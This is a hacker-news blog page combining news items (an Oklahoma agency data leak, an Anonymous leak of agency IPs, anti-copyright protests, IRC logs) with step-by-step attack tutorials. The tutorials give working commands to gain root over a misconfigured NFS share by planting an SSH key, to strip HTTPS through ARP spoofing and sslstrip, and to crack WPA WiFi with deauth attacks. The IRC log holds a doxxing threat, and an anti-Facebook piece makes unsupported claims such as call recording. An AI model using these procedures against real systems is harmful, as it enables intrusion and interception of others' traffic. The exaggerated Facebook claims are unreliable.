FBI Records, Emails, Social Security Numbers Exposed In A Million Files Data Leak; Anonymous Separately Leaks All FBI Agents

 

A massive data leak has been reported at the Oklahoma Securities Commission, millions of records — including files related to sensitive FBI investigations over the last seven years, emails dating back 17 years and thousands of Social Security numbers — have all been exposed.

The breach was revealed last month by Greg Pollock, a cybersecurity researcher at UpGuard, who stated he found that millions of files were publicly available on an online server and didn’t require any password to access them. Exposing the complete lack of security for sensitive information by U.S. government officials.

“It represents a compromise of the entire integrity of the Oklahoma Department of Securities’ network,” UpGuard’s Chris Vickery told Forbes, the first outlet that reported the breach. “It affects an entire state level agency. … It’s massively noteworthy.”

Vickery told Forbes that the exposed FBI documents included “all sorts of archive enforcement actions” from the last seven years. He added that the records also contained various files with agent-filled timelines of interviews related to investigations, bank transaction histories, and emails from individuals related to the cases.

The FBI files also named notable companies and banks such as — AT&T, Goldman Sachs, and Lehman Brothers. Although, Forbes didn’t comment on whether the organizations were under investigation.

The leak further contained emails that date back 17 years, Social Security numbers and other data stretching back to the 1980s, according to Forbes.

The breach was due to leaving an open rsync server. Such servers are traditionally used to back up large batches of data. But that information is supposed to be secure and should be protected by a username and password. Which this server lacked making it accessible to anyone with an internet connection.

If that’s not enough, passwords for computers on the Oklahoma government’s network were also revealed by the breach.

While this isn’t reported to be a hack and only a slight exposure a mysterious file appeared on the private Pastebin like website, privatebin.net. The file posted by Anonymous claiming to be from CgAN (https://cyberguerrilla.info) contains purported leaked information of all current FBI agents, their professions, phone numbers, and email addresses. As well as IP addresses for several intelligence services including the CIA, GCHQ, and many others.

The encrypted message opens up, stating “its time to unite against the system and fight the intelligence agencies.”

“UNITE AGAINST SYSTEM! Eye is watching you every single second of time!
Become Anonymous! Strike against intelligence services!
Targeted and leaked intelligence services: DGSE (France), MI6 (UK), CIA and FBI (USA)

defense.gouv.fr ||| DGSE ||| Direction générale de la sécurité extérieure ||| 45.60.184.47
sis.gov.uk ||| MI6 – The Secret Intelligence Service (SIS) ||| 194.61.183.124
cia.gov ||| Central Intelligence Agency ||| 23.192.74.22
fbi.gov ||| Federal Bureau of Investigation ||| 104.16.78.187 , 104.16.79.187 , 104.16.77.187 , 104.16.76.187 , 104.16.75.187

Citizens of the world, you have just few time to ACT for your future and freedom!
Governments are submitting new laws that human rights of all citizens will be suspended forever!
Intelligence services are preparing to arrest all activists, whistleblowers, freedom organizations, hackers and hacktivists all around the world in a year!

All activists who are acting for freedom and peace,
All hackers who are on the side of internet freedom,
All citizens who do not want to be as a slave in future,

Act against them save Anonymous and Wikileaks,
They are preparing to destroy all freedom activists and peace defenders,
We have to unite!
Take action to free all Anons, to free all activists, to save Anonymous
to free Julian Assange, to save Wikileaks,
to free Timothy Justen French, free James E. Robinson, free Jeremy Hammond, free Martin Gottesfeld, free Matt Dehart.

Save freedom activists for peace and our future!
We are Anonymous
We do not forgive,
We do not forget,
Expect us!,” Anonymous writes.

There is no information available on how Anonymous obtained the list of FBI officials or what FBI server was reached to obtain the data. However, this continues to expose that security is a joke even when taken seriously, if a hacker wants to find a vulnerable entry point they will.

 

Internet Activists, Pirates And Anonymous Call For Protests Throughout Europe Against ACTA 2

Following over 4 million people signing a petition delivering it to EU Parliament, activists have now decided to organize protests for January 19th, 2019 across Europe against proposed Articles 11, 12 a and 13.

According to Torrent Freak, European Parliament is expected to finalize the final text of Article 13, which is part of the EU’s copyright reform law by Monday.

Those that support the idea of Anonymous, Pirates and Internet Rights Activists have all joined forces once again to combat what many are calling the fight against Acta 2. These Articles will have multiple legal implications that will destr0y the Internet as we know it. Not only will they include an “upload filter” if passed to block copyrighted (or unwanted) content from being uploaded on the Internet, it will also be impossible to link to source material, including educational content and even memes. That’s right the EU is coming or your memes! Hide your kids, hide your wife and hide your memes because the EU’s coming for them all.

This will affect all YouTubers and independent content creators, commenters et al distilling innovation. The copyright directive will ultimately cause loss of content for millions of creative minds throughout Europe and the EU will likely push those laws transnational into the Americas and elsewhere.

Further, under article 11 every link posted, you will be charged under what’s being called a link tax. Fight with us against this censorship.

Articles like 12a, for example, will make it illegal to upload any personal video from a sporting event because the copyright will be fully to those hosting or sponsoring the event.

Article 13 is intended to make website proprietors responsible for the content that users post on their websites, effectively forcing the owners to move behind an upload filter to protect themselves against huge claims by copyright owners and agencies that work on their behalfs like the MPAA and RIAA.

Pirate Parties International MEP Julia Reda notes that users will be responsible and liable for any copyright infringements they make on Internet platforms.

“The negotiators have reached agreement on the core of Article 13, which will change the internet as we know it: They want to make internet platforms directly liable for any copyright infringements their users commit,” Reda notes.

Electronic Frontier Foundation (EFF) warns that the proposed policies will increase censorship and surveillance throughout Europe creating a stasi state. The digital rights organization specifically calls on people from Germany, Sweden, Poland, and Luxembourg, to speak out.

“Your national government depends on your goodwill to win the votes to continue its mandate. This is a rare moment in European lawmaking when local connections from citizens matter more than well-funded, international corporations,” EFF writes.

This is something that “will destroy our internet, And we cannot accept it. So we are fighting back. Activists, hacktivists and pirates are now uniting under the banner of StopACTA2,” Anonymous Bites Back writes.

Anonymous Bites Back further expresses that the radio show hosted by Anons is in “full support of the (street) protests against these Orwellian moves to censor the internet. We have had several episodes about this subject already, and we plan to join the protesters on the street and broadcast live to our network.”

The StopACTA2 movement, coordinated by the Polish StopACTA2 crew and the crew of Anonymous Worldwide and many others including Pirate Parties International with its co-chair Bailey Lamon and board member Raymond Johansen urge everyone to do everything in your power to support Stop ACTA2 through social media and on the ground actions.

Supporters of the fight against ACTA 2 include wolnemediaSoMee.Social, Bitchute, Presearchblogmedia24Anonymous Bites BackwykoppolskapartiapiratowPirate Parties International,  kontestacjaHackread.cominsproStowarzyszenie LibertarianskieAnonymous Info Army Poland, and Anon Ops Poland according to the StopActa2.org website.

For now, we have obtained partial victory with Creative Sectors calling for a suspension of negotiations on Article 13 with 14 organizations calling for its halt according to Creative Refresh.

The first wave of street protests in at least 20 different cities in 15 countries are being planned and prepared for January 19, 2019 all across Europe.  Share this article, organize together amongst one another and send a message, show the powers-that-be that the Internet belongs to the people and not the corporations or the power-hungry elites that seek to profit off of the free sharing of information.

On social media, supporters are using the following hashtags for digital protests — #stopACTA2, #CopyrightDirective, #SaveYourInternet, #SaveTheInternet, #Article11, #Article13, #UploadFilters, #LinkTax, #Filternet, #ACTA2 #Anonymous.

You can find out more information by visiting StopActa2.org a website being run to support operation Stop Acta 2. The website will be kept up to date with a full list of the existing protest locations. Are you an experienced organizer who wants to help organize in Europe for protesting against ACTA 2? Then contact info@stopacta2.org for any information, or if you want to start your own protest. Continue tuning into Hacknews.eu where we will keep you up to date with all proceeding actions regarding Stop ACTA 2.

 

Microsoft Patches Windows Vulnerabilities Including (CVE-2018-8611) Kernel Transaction Manager Allowing Elevated Privilege

Microsoft released several year-end December, security updates to patch a total of 39 vulnerabilities in its Windows operating systems and applications—10 of which they rated as critical including (CVE-2018-8611.)

The flaw affects almost all versions of Windows operating system—Windows 7 through Server 2019.

The exploit originally discovered and reported by security researchers at Kaspersky, allows for a zero-day attack exploitation of elevation of privilege (EoP) bug in the Windows Kernel (ntoskrnl.exe.) Exploiting the Windows Kernel could then allow malicious programs to execute their own subjective code with higher privileges on any targeted vulnerable systems.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox,” Kaspersky said.

“Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Another important publicly known vulnerability known as CVE-2018-8517, which is a denial-of-service bug in web applications was also fixed in the update.

“The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application,” Microsoft explains.

Microsoft also patched 10 critical and 29 important vulnerabilities affecting a range of its products, including — Windows, Edge, Internet Explorer, ChackraCore, Office,  Microsoft Office Services and Web Apps, and the .NET Framework responsible for a number of applications.

Users and system administrators alike are strongly recommended to apply the latest security patches as prompted to update, to not risk becoming a slave for a hacker’s botnet. Unless of course, you want to opt for being a target of a hacker or group of hackers.

Then by all means, please keep your system software outdated with these vulnerabilities present including the Kernal bug. Which hackers are going to have a field day with that bug present, just remember you the reader are responsible for all your actions with this information and this is just security education.

For installing the latest security patch updates, go to Settings → Update and Security → Windows Update → then Check for updates, on your computer system or you can install the updates manually.

 

Anonymous Attacks French Government, AnonOps #OpFrance Owner “AnonKiller” Exposed Logging IPs

Anonymous has declared war on the French government after protests have resulted in the bloodshed of protesters. While, one of the main admins named “AnonKiller” on Anon Ops IRC #OpFrance, has been exposed logging IPs in the channel.

Accounts associated with Anonymous, have been seen on Twitter attacking the French government resulting in several cyber attacks including database hacks and DDoS attacks of the French government in support of the Yellow Vests protesters on the ground. Dozens of hacktivists are participating in the operation against the French government codenamed #OpFrance.

A press release for the Anonymous operations against France can be seen below acquired from Anon Files.

According to a thread on Twitter by the same account that posted a hack of Ministry of Defense officials, known to be associated with Anonymous operations CgAn_Doemela, an anon going by “AnonKiller’ is being accused of being a snitch for logging IPs inside IRC.

Although, AnonKiller argues that it’s because the far-right “demos” (demosophy) is involved in the operation against France and the “extreme right cannot reflect the image of Anon.” Others are calling the user a potential informant or provocateur within the collective.

IRC LOGS according to CgAn_Doemela:

**** BEGIN LOGGING AT Sat Dec  8 20:47:11 2018
Dec 08 20:47:11 *        Now talking on #opfrance
Dec 08 20:47:11 *        Topic for #opfrance is: www.facebook.com/AnonFr2.0 // www.anonops.fr // www.twitter.com/AnonFrOfficiel // Nous dementons toute opération dite en notre nom en soutient au mouvement des gillets jaunes!
Dec 08 20:47:11 *        Topic for #opfrance set by anonkiller (Fri Dec  7 09:10:52 2018)
Dec 08 20:48:19 <anonkiller>        hello because this group is orchestrated by the demos, just look at what is being finished
Dec 08 20:48:53 <anonkiller>        the extreme right can not reflect the image of the anon
Dec 08 20:49:17 <anonkiller>        this group is orchestrated by demosophy
Dec 08 20:50:29 <Cogitabundus>        You do realize that calls into question your capacity to run a channel.
Dec 08 20:50:40 <Cogitabundus>        Since we’ve very anti-IP harvesting.
Dec 08 20:50:47 <cookie>        article from 2015 mind you
Dec 08 20:51:29 <anonkiller>        they were identified behind telegram channels and other media
Dec 08 20:53:05 <anonkiller>        I removed the post for ip but you can inquire there demosophy well behind
Dec 08 20:59:05 <anonkiller>        you can also look at their pads, the consistency of the sites listed relative to the target that was determined
Dec 08 20:59:48 <cookie>        so you’re attacking anons because you don’t agree with the targets?
Dec 08 21:01:33 <anonkiller>        no because the extreme right is behind
Dec 08 21:01:54 <anonkiller>        extreme right it’s not anon
Dec 08 21:02:25 <Cogitabundus>        What’s Anon or not isn’t really something easy to determine.
Dec 08 21:02:34 <cookie>        hmmm they may be trying to hide behind anon. but most of those target were chosen by legit anons
Dec 08 21:02:36 <Cogitabundus>        When it’s such a loose thing.
Dec 08 21:02:41 <cookie>        its a coordinated attack
Dec 08 21:05:07 <anonkiller>        legitimate people yes because at the beginning we also help the yellow vests but since the movements of etreme was behind many of their groups, it was released, the fight is part of a fair cause but was diverted and become dangerous
Dec 08 21:05:37 <anonkiller>        I would stay out if you want to do this operation go there but I do not care
Dec 08 21:06:06 <anonkiller>        I prefer to track terrorism, which is a priority for me
Dec 08 21:07:54 <cookie>        so to you the anons on cgan are terrorists?
Dec 08 21:09:14 <anonkiller>        I did not say that
Dec 08 21:09:44 <cookie>        you say you prefer tracking terrorism
Dec 08 21:09:47 <anonkiller>        I said that I do not interfere anymore and that I went back to track terrorists like daesh
Dec 08 21:09:50 <cookie>        and you have screenshots from cgan
Dec 08 21:10:39 <anonkiller>        yes i have a nice screenshot where they talk about demosophy ..
Dec 08 21:11:34 <anonkiller>        but carrefour and saint gobain are government sites for you?
Dec 08 21:12:57 <cookie>        well anyone could make a pad. just because someone is spamming a pad in a channel doesnt mean it is an official target
Dec 08 21:13:07 <cookie>        we keep official things in official/hidden chans
Dec 08 21:16:39 <cookie>        well i gtg more stuff for op; also anonkiller if i find out you’re working with @zataz or @Damien_Bancal for some counter intel shit or for the FR gov. I will stop at nothing to financially fuck you then maybe drop your info for some local angry protestors to pay you a visit. 🙂 dont fuck with Anons kkbye
Dec 08 21:16:47 *        You have left channel #opfrance (Leaving)
**** ENDING LOGGING AT Sat Dec  8 21:16:47 2018

Meanwhile, the user’s Twitter account identified as @AnonOfFrance is calling on Anons to join their discord, which should be done at the sole discretion of the user. While it’s noted that Discord doesn’t log IPs if you choose to enter the server, be aware that malicious users could send – files, [if it’s enabled on the server] Ip logging links such as setup honeypots or use services that allow Ip tracking.

Stay safe, use proper OpSec and make sure you are behind a VPN, spoof your mac address and use TOR and a safe DNS, all that jazz. Remember you are responsible for your own actions. Sail safe.

Hacker Hacks 50,000 Printers For Save PewDiePie Campaign Exposing Dangerous Of Printer Vulns

A bored young hacker known online on Twitter as TheHackerGiraffe has exposed vulnerabilities that could be potentially dangerous for networked printers.

TheHackerGiraffe exploited vulnerabilities in security protocols for internet-connected devices using Shodan to hack into 50,000 exposed printers as part of the “Save PewDiePie” campaign.

According to TheHackerGiraffe, PewDiePie’s world-famous YouTube channel with more than 19 billion views over five years — is set to be distracted by Indian music production channel T-series.

On Sunday, T-Series’ subscriber count came within less than 50,000 of surpassing PewDiePie.

So rather than allow that to happen as a troll, TheHackerGiraffe decided to search Shodan,  a search engine built specifically to find vuInternet-connected devices. Which resulted to his amazement in 800,000 vulnerable printers. Then TheHackerGiraffe downloaded PRET, a tool that would allow him to access files, damage the printer access the internal network and view the printer’s memory.

In a thread, on Twitter, he described his shock at discovering what PRET would allow him do to the printers.

TheHackerGiraffe said:

“PRET had the scariest of features. Ability to access files, damage the printer, access the internal network; things that could really cause damage. So I had to do this, to at least help organisations and people that can protect themselves.”

In the Twitter thread, TheHackerGiraffe revealed that while looking at ways to apply support for PewDiePie (without the streamer’s knowledge or permission of hacking 50,000 printers), he decided to carry out his own guerilla printing campaign using the vulnerable internet-connected printers.

Rather than damage the printers as a blackhat might do for fun, TheHackGiraffe decided to just use his access to print out flyers from the vulnerable printers and print out a message urging people to subscribe to PewDiePie’s channel. He also urged the unsuspecting civilians to unsubscribe from T-Series if they were, with the Youtuber’s signature “brofist” cavitate.

In a video he posted himself about the fight to retain his crown, PewDiePie whose real name is Felix Kjellberg – said he enjoyed the support.

“All of this support to keep me on top is so funny. I love it. Please keep it up,” PewDiePie said.

“But don’t do anything illegal OK… because that will look bad on me,” he added.

TheHackerGiraffe interviewed with The Verge in which he stated what was possible due to the vulnerable printers he found. Which as of this writing is still 800,000 printers.

“Hackers could have stolen files, installed malware, caused physical damage to the printers and even used the printer as a foothold into the inner network,” they said.

“The most horrifying part is I never considered hacking printers before, the whole learning, downloading and scripting process took no more than 30 minutes”, the Hacker told the technology news website TheVerge.

Now imagine what’s possible, if your printer is vulnerable due to open ports, all types of information could be stolen directly from the printer’s memory, malicious software could be installed to log everything printed and much more. The Moral of the story is obviously close your ports. Lucky for victims of this printing campaign the hacker didn’t have a malicious intent.

Exploit a Misconfigured NFS Server | SSH | RPCbind

What NFS Server is ?

NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to  authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.

Let the victim ip is 192.168.43.176

open terminal and type rpcinfo -p 192.168.43.176  this will return all the registered RPC programs.

many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”

type sudo showmount -e 192.168.43.176 this will return the mount directories.

/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs 192.167.43.176:/ /tmp/dir 

now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa

now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir 

 

Now You can directly connect to the server type command ssh root@192.168.43.176 

Prevention:

If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory  as mount point.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with tor on linux

DarkWeb is very usefull to be anonymous you can get you own .onion website and host on wide area network free.
i assume you are using kali linux or parrot sec os open terminal and install tor sudo apt-get install tor after you just need to edit some in configuration file of tor.

open terminal and type cd /etc/tor and than ls for list dir you will see torrc file there that you have to edit

open this file in your favorite text editor and add two lines
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local ip with ifconfig 
open your file manager with root and go in /var/lib/tor/hidden_service there you get your website
and boom you done it at last start tor by sudo service tor start and sudo service apache2 start

NOTE:- Now you face a problem that site cant be reach! Here is the solution

Forward your port | Go on Internet

This is just make a connection between your local ip to the internet so you can access your website worldwide
for more about Port forwarding click here
i suggest you to use NGROK for download click  available for all Systems
after Download you just forward your port with ./ngrok http 80 80 for http so you apache server will be on WAN and your onion site can reach it.
after forward your port you see like this

just copy 4f28046d.ngrok.io this link and paste where you put your local ip if you remember above
in file torrc  and save it again and restart tor again and now you can access your apache site with onion site
paste your website here  /var/www  and boom your website is ready for share on social media.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.


HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction of HSTS, ARP, And sslstrip

HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.

You have to forward IP By IPTables and send a fake arp request Request.

 

Lets Do it.

MITMF -(Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf  just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section

-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.

run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts

get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n

SSlStrip

Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward

start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip

Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

finally Launch sslstrip sslstrip –l 10000

now open new terminal  and see results tail -n 50 -f sslstrip.log

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.

Hope you had a nice reading, comming back to hacknews.

Why people are deleting their Facebook and you should do the same

If you still own a Facebook account, you are apparently living in the past. After a recent privacy scandal causing 78 million Facebook users to have their private data shared around the world, and abused for political reasons, problems involving the once popular social network are piling up.

The most recent shocking event involves the team of Facebook attempting to convince hospitals to share their patients health information with the site, causing a new outrage among (former) users of the social goliath. Facebook began speaking with hospitals last year about the possibility of matching anonymized user profiles with health data, but the news leaked last week.

Meanwhile a huge online movement called #DeleteFacebook is convincing millions of Facebook victims to delete their accounts and to never come back, something that has caused a loss on the stock market of over 110 billion in value. The movement is active on many locations on the internet and is becoming more popular fast. It is now estimated that at least 1/3 of all individuals active in the tech world have deleted their Facebook or are planning to do this.

The #DeleteFacebook movement suddenly received a big boost, and became a lot larger, when celebrities like Elon Musk, Will Ferrell and Cher attached themselves to it. After whistleblowers like Edward Snowden and Julian Assange expressed their support as well, the cat was out of the bag.

So what are the main reasons you should consider deleting your Facebook account?

1: The social network saves all the images and videos you send on it. Even if it is done in private chats. They then share this content with different companies and partners around the world. This means your private material at this moment could have been watched by millions of people on the planet.

2: Facebook has been caught recording your text messages and your phone calls. They also keep meta data showing exactly who you call, when and for how long, this data includes the full information and phone numbers of your contacts. Even if your contacts are later deleted from your phone, Facebook still records it all. They do the same thing for text messages, logging everything. And again this is shared with all their partners around the world, or pretty much anyone who pays for it.

3: Facebook has been censoring activists, dissidents and hacktivists for years causing it to become a bubble of disinfo and reactionary political speech, where advertisers and media are feeding you with information that is not only destructive for your brain, it also harms your quest for knowledge.

Why should you delete Facebook now instead of trying to change it? The website collected a lot of data about you. The terms and conditions are carefully constructed to make it look like you agree to this. The only option you have now is to delete your account, effectively cancelling your agreement. This means they can no longer sell your data. We believe this is your only option if you want to avoid further damage to your private life.

WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today will be about WIFI hacking using the DeAuth attack, most useful for hacking WPA/WPA2 networks. It works by aquiring a handshake and decrypting it using a wordlist.
The system used in the tutorial is Kali linux, but it will work for any .deb based system (Debian, Mint, Ubuntu, etc.) and the technique will not be much different for other distributions either.

1: The tutorial is pretty straightforward, and starts out by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and receive packets. Your network adapter then receives beacons. This means you get a clear view of all the different WIFI networks around you. After this you select the correct BSSID from the list, and the correct channel.

3: Using AIREPLAY-NG and filling in the correct BSSID and channel, we launch a DeAuth attack using a simple command. Then we wait until a so called “handshake” is received.

4: Close all the processes and start cracking the .cap (capture) file. This will be done using a wordlist. The program used for this is AIRCRACK-NG. Any wordlist saved as a .txt file will do. The bigger the wordlist, the more chance you have of cracking it.

Extra: A good wordlist to use is called the RockYou wordlist, wich is available for download here.

Below is a full tutorial video showing you the exact codes and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!